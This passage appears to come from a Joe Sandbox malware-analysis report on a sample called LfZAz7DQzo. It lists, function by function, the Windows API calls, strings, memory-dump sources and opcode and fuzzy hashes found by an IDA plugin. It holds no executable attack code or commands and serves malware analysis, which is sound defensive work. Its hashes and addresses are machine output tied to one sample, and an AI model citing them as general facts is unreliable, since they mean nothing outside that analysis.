                                         • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: BuffCharMessageSendUpper
                                        • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                        • API String ID: 3974292440-719923060
                                        • Opcode ID: aa3b00ec91be640401f9f8302ffe009498ffcfd0142515888b074f007775cacf
                                        • Instruction ID: 9adc3119abac3979e25d2f8cf0b9333bc2b1f5c1a1d0ec74e2d0955723bafaca
                                        • Opcode Fuzzy Hash: aa3b00ec91be640401f9f8302ffe009498ffcfd0142515888b074f007775cacf
                                        • Instruction Fuzzy Hash: 8CA180B16142019FCB14EF10C991A6AB3E5BF88324F145969B99A6B3D3DB30FC05EB51
                                        APIs
                                        • LoadCursorW.USER32(00000000,00007F89), ref: 00EF5309
                                        • LoadCursorW.USER32(00000000,00007F8A), ref: 00EF5314
                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00EF531F
                                        • LoadCursorW.USER32(00000000,00007F03), ref: 00EF532A
                                        • LoadCursorW.USER32(00000000,00007F8B), ref: 00EF5335
                                        • LoadCursorW.USER32(00000000,00007F01), ref: 00EF5340
                                        • LoadCursorW.USER32(00000000,00007F81), ref: 00EF534B
                                        • LoadCursorW.USER32(00000000,00007F88), ref: 00EF5356
                                        • LoadCursorW.USER32(00000000,00007F80), ref: 00EF5361
                                        • LoadCursorW.USER32(00000000,00007F86), ref: 00EF536C
                                        • LoadCursorW.USER32(00000000,00007F83), ref: 00EF5377
                                        • LoadCursorW.USER32(00000000,00007F85), ref: 00EF5382
                                        • LoadCursorW.USER32(00000000,00007F82), ref: 00EF538D
                                        • LoadCursorW.USER32(00000000,00007F84), ref: 00EF5398
                                        • LoadCursorW.USER32(00000000,00007F04), ref: 00EF53A3
                                        • LoadCursorW.USER32(00000000,00007F02), ref: 00EF53AE
                                        • GetCursorInfo.USER32(?), ref: 00EF53BE
                                        • GetLastError.KERNEL32(00000001,00000000), ref: 00EF53E9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                         • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Cursor$Load$ErrorInfoLast
                                        • String ID:
                                        • API String ID: 3215588206-0
                                        • Opcode ID: cc0509aa37f15fda3d761bc3a9811982b1112b17ed42018c610b58770d175009
                                        • Instruction ID: 6005bdd4da8ca8ac5bc1ae0995f17a4f1d651a93e058ad20e7249da3e5092423
                                        • Opcode Fuzzy Hash: cc0509aa37f15fda3d761bc3a9811982b1112b17ed42018c610b58770d175009
                                        • Instruction Fuzzy Hash: 5B418470E043196ADB109FBA8C4986FFFF8EF51B10B10452FE619E7291DAB8A401CE91
                                        APIs
                                        • GetClassNameW.USER32(?,?,00000100), ref: 00EDAAA5
                                        • __swprintf.LIBCMT ref: 00EDAB46
                                        • _wcscmp.LIBCMT ref: 00EDAB59
                                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00EDABAE
                                        • _wcscmp.LIBCMT ref: 00EDABEA
                                        • GetClassNameW.USER32(?,?,00000400), ref: 00EDAC21
                                        • GetDlgCtrlID.USER32(?), ref: 00EDAC73
                                        • GetWindowRect.USER32(?,?), ref: 00EDACA9
                                        • GetParent.USER32(?), ref: 00EDACC7
                                        • ScreenToClient.USER32(00000000), ref: 00EDACCE
                                        • GetClassNameW.USER32(?,?,00000100), ref: 00EDAD48
                                        • _wcscmp.LIBCMT ref: 00EDAD5C
                                        • GetWindowTextW.USER32(?,?,00000400), ref: 00EDAD82
                                        • _wcscmp.LIBCMT ref: 00EDAD96
                                          • Part of subcall function 00EA386C: _iswctype.LIBCMT ref: 00EA3874
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                         • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                        • String ID: %s%u
                                        • API String ID: 3744389584-679674701
                                        • Opcode ID: 344dfd612e22005c06ea2f26b8a787cdddcb261dd18429f27072459a745b9839
                                        • Instruction ID: c37684a7228acb7e12b84fab2865951556d80272819cf3b007bdb0a513febb96
                                        • Opcode Fuzzy Hash: 344dfd612e22005c06ea2f26b8a787cdddcb261dd18429f27072459a745b9839
                                        • Instruction Fuzzy Hash: D4A1C771204706AFD714DF24C884BAAF7E9FF04319F14563AF999E2690D730EA46CB92
                                        APIs
                                        • GetClassNameW.USER32(00000008,?,00000400), ref: 00EDB3DB
                                        • _wcscmp.LIBCMT ref: 00EDB3EC
                                        • GetWindowTextW.USER32(00000001,?,00000400), ref: 00EDB414
                                        • CharUpperBuffW.USER32(?,00000000), ref: 00EDB431
                                        • _wcscmp.LIBCMT ref: 00EDB44F
                                        • _wcsstr.LIBCMT ref: 00EDB460
                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00EDB498
                                        • _wcscmp.LIBCMT ref: 00EDB4A8
                                        • GetWindowTextW.USER32(00000002,?,00000400), ref: 00EDB4CF
                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00EDB518
                                        • _wcscmp.LIBCMT ref: 00EDB528
                                        • GetClassNameW.USER32(00000010,?,00000400), ref: 00EDB550
                                        • GetWindowRect.USER32(00000004,?), ref: 00EDB5B9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                         • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                        • String ID: @$ThumbnailClass
                                        • API String ID: 1788623398-1539354611
                                        • Opcode ID: 97e9ca91c7aac3b97185e5f9a5abc793d3e73475128dfc31f6771b6b762faa18
                                        • Instruction ID: 1b8de81ea86ec591ced5250f36d63bddf1350f03728a51a4034ef383cefbd90f
                                        • Opcode Fuzzy Hash: 97e9ca91c7aac3b97185e5f9a5abc793d3e73475128dfc31f6771b6b762faa18
                                        • Instruction Fuzzy Hash: D581B471004305DBDB14DF10D885FAA77E8FF44718F04A56AFD99AA292EB30ED4ACB61
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                         • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: __wcsnicmp
                                        • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                        • API String ID: 1038674560-1810252412
                                        • Opcode ID: a03f1e8cd3f41d2251484f12c933defbfd1ae84a69c954d1715dca08d5eb3174
                                        • Instruction ID: 78239584fed8d34b7307a50510fbb3944f0a21ea641191aa128e6ff0905c8f8c
                                        • Opcode Fuzzy Hash: a03f1e8cd3f41d2251484f12c933defbfd1ae84a69c954d1715dca08d5eb3174
                                        • Instruction Fuzzy Hash: 2E31A332948205E6DB14FA60CD83EEE77E4DF25760F61202AB449711E1FFE1EE05D652
                                        APIs
                                        • LoadIconW.USER32(00000063), ref: 00EDC4D4
                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00EDC4E6
                                        • SetWindowTextW.USER32(?,?), ref: 00EDC4FD
                                        • GetDlgItem.USER32(?,000003EA), ref: 00EDC512
                                        • SetWindowTextW.USER32(00000000,?), ref: 00EDC518
                                        • GetDlgItem.USER32(?,000003E9), ref: 00EDC528
                                        • SetWindowTextW.USER32(00000000,?), ref: 00EDC52E
                                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00EDC54F
                                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00EDC569
                                        • GetWindowRect.USER32(?,?), ref: 00EDC572
                                        • SetWindowTextW.USER32(?,?), ref: 00EDC5DD
                                        • GetDesktopWindow.USER32 ref: 00EDC5E3
                                        • GetWindowRect.USER32(00000000), ref: 00EDC5EA
                                        • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00EDC636
                                        • GetClientRect.USER32(?,?), ref: 00EDC643
                                        • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00EDC668
                                        • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00EDC693
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                        • String ID:
                                        • API String ID: 3869813825-0
                                        • Opcode ID: 8cfe351151e704f31a646ebefda238dfecce87fc8eff103dd0f8d303d3905791
                                        • Instruction ID: 48f46d556188a2b51357f8cd7482f06f4a2cbe1f249dbcad4aeb7cf4c79fff1e
                                        • Opcode Fuzzy Hash: 8cfe351151e704f31a646ebefda238dfecce87fc8eff103dd0f8d303d3905791
                                        • Instruction Fuzzy Hash: 04518E3090070AAFDB20DFA8DD85B6EBBF5FF04745F104929E686A26A0C775F945DB40
                                        APIs
                                        • _memset.LIBCMT ref: 00F0A4C8
                                        • DestroyWindow.USER32(?,?), ref: 00F0A542
                                          • Part of subcall function 00E87D2C: _memmove.LIBCMT ref: 00E87D66
                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00F0A5BC
                                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00F0A5DE
                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F0A5F1
                                        • DestroyWindow.USER32(00000000), ref: 00F0A613
                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00E80000,00000000), ref: 00F0A64A
                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F0A663
                                        • GetDesktopWindow.USER32 ref: 00F0A67C
                                        • GetWindowRect.USER32(00000000), ref: 00F0A683
                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00F0A69B
                                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00F0A6B3
                                          • Part of subcall function 00E825DB: GetWindowLongW.USER32(?,000000EB), ref: 00E825EC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                        • String ID: 0$tooltips_class32
                                        • API String ID: 1297703922-3619404913
                                        • Opcode ID: ee8c2bea68d263191d141cc1500ccf16ce99252c559f6f1757ba8d61f9ecf46e
                                        • Instruction ID: b4c59319abf7c3e8fc0ded06793965157fa586900484f4bc7a6aded21fee3d66
                                        • Opcode Fuzzy Hash: ee8c2bea68d263191d141cc1500ccf16ce99252c559f6f1757ba8d61f9ecf46e
                                        • Instruction Fuzzy Hash: AC717471550309AFD720CF28CC49F6A7BE6FB89314F080528F985972A1CB72E946EB12
                                        APIs
                                        • CharUpperBuffW.USER32(?,?), ref: 00F046AB
                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00F046F6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: BuffCharMessageSendUpper
                                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                        • API String ID: 3974292440-4258414348
                                        • Opcode ID: 2998cac0018df60caaa3b9e85c6b894a5d28c0e4dc5758fc774ebbd555db0dc9
                                        • Instruction ID: b6e21e36067b3aec342fead48486898c200eee836e418529acef6f5f2c35f5ca
                                        • Opcode Fuzzy Hash: 2998cac0018df60caaa3b9e85c6b894a5d28c0e4dc5758fc774ebbd555db0dc9
                                        • Instruction Fuzzy Hash: 5C9161B56043019FCB14EF10C491A69B7E1AF89314F04986DF99A6B3A3DB31FD46EB41
                                        APIs
                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00F0BB6E
                                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00F06D80,?), ref: 00F0BBCA
                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00F0BC03
                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00F0BC46
                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00F0BC7D
                                        • FreeLibrary.KERNEL32(?), ref: 00F0BC89
                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00F0BC99
                                        • DestroyCursor.USER32(?), ref: 00F0BCA8
                                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00F0BCC5
                                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00F0BCD1
                                          • Part of subcall function 00EA313D: __wcsicmp_l.LIBCMT ref: 00EA31C6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
                                        • String ID: .dll$.exe$.icl
                                        • API String ID: 3907162815-1154884017
                                        • Opcode ID: da44301b13f419730a5b517d9db266d62fcad3e164f98ed7ff53d3b50b37eef0
                                        • Instruction ID: 470cf14c45b2776922dc8c4f0a4ad479bd05a9f8ef026a31d887ad91d86240e6
                                        • Opcode Fuzzy Hash: da44301b13f419730a5b517d9db266d62fcad3e164f98ed7ff53d3b50b37eef0
                                        • Instruction Fuzzy Hash: 5161BFB1900219BBEB24DF64CC45FBE77A8FB08720F108519F915EA1D1DB74A994FBA0
                                        APIs
                                          • Part of subcall function 00E89997: __itow.LIBCMT ref: 00E899C2
                                          • Part of subcall function 00E89997: __swprintf.LIBCMT ref: 00E89A0C
                                        • CharLowerBuffW.USER32(?,?), ref: 00EEA636
                                        • GetDriveTypeW.KERNEL32 ref: 00EEA683
                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EEA6CB
                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EEA702
                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EEA730
                                          • Part of subcall function 00E87D2C: _memmove.LIBCMT ref: 00E87D66
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                        • API String ID: 2698844021-4113822522
                                        • Opcode ID: 6822239c8da67fe312dda8c53d71cdfff9cbd34c17eba035a723df88dd45521a
                                        • Instruction ID: af3912b8cbe97bdb137ef28a7b05a634c4c49ca18849fb85c64254290dc61095
                                        • Opcode Fuzzy Hash: 6822239c8da67fe312dda8c53d71cdfff9cbd34c17eba035a723df88dd45521a
                                        • Instruction Fuzzy Hash: DA514B711047099FC704EF21C88186AB7F4FF98718F18596DF89A672A1DB31EE0ACB52
                                        APIs
                                        • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00EEA47A
                                        • __swprintf.LIBCMT ref: 00EEA49C
                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00EEA4D9
                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00EEA4FE
                                        • _memset.LIBCMT ref: 00EEA51D
                                        • _wcsncpy.LIBCMT ref: 00EEA559
                                        • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00EEA58E
                                        • CloseHandle.KERNEL32(00000000), ref: 00EEA599
                                        • RemoveDirectoryW.KERNEL32(?), ref: 00EEA5A2
                                        • CloseHandle.KERNEL32(00000000), ref: 00EEA5AC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                        • String ID: :$\$\??\%s
                                        • API String ID: 2733774712-3457252023
                                        • Opcode ID: 4258469a1cd6249fd081143ad10730f3085f1c7f57b08c171ac19e508952ff5f
                                        • Instruction ID: ab7e82c615cf0ae137c06ad25dab49f0331391736e5b5a353c43ca53c7a03304
                                        • Opcode Fuzzy Hash: 4258469a1cd6249fd081143ad10730f3085f1c7f57b08c171ac19e508952ff5f
                                        • Instruction Fuzzy Hash: D131B37150024DABDB21DFA1DC49FEB77BCEF89705F1450BAF508E6160E770A6488B25
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                                        • String ID:
                                        • API String ID: 884005220-0
                                        • Opcode ID: 222b5b1454156853df318cf23656427864a1128579740431e596dce165353808
                                        • Instruction ID: 53220f5e8d9411c4d37064f43eaf0483f54e2aa8d67c3b1b8e7644787fa04452
                                        • Opcode Fuzzy Hash: 222b5b1454156853df318cf23656427864a1128579740431e596dce165353808
                                        • Instruction Fuzzy Hash: C261F872500205AFDF119F24D881BEB7BE5EF16329F187179E811BB191DB35E940CB92
                                        APIs
                                        • __wsplitpath.LIBCMT ref: 00EEDC7B
                                        • _wcscat.LIBCMT ref: 00EEDC93
                                        • _wcscat.LIBCMT ref: 00EEDCA5
                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00EEDCBA
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00EEDCCE
                                        • GetFileAttributesW.KERNEL32(?), ref: 00EEDCE6
                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00EEDD00
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00EEDD12
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                        • String ID: *.*
                                        • API String ID: 34673085-438819550
                                        • Opcode ID: a4570d03a6d87a801c422092bef8474b6b52cf534ff141063dae62605cc2fee2
                                        • Instruction ID: 932f0c4547cb3d3698ef5e7a813599496c22a1bafa2783317a7b0fa445ed931e
                                        • Opcode Fuzzy Hash: a4570d03a6d87a801c422092bef8474b6b52cf534ff141063dae62605cc2fee2
                                        • Instruction Fuzzy Hash: 0781A5715082899FC724EF25CC459AEB7E8BF88354F19982EF889E7251E730DD44CB52
                                        APIs
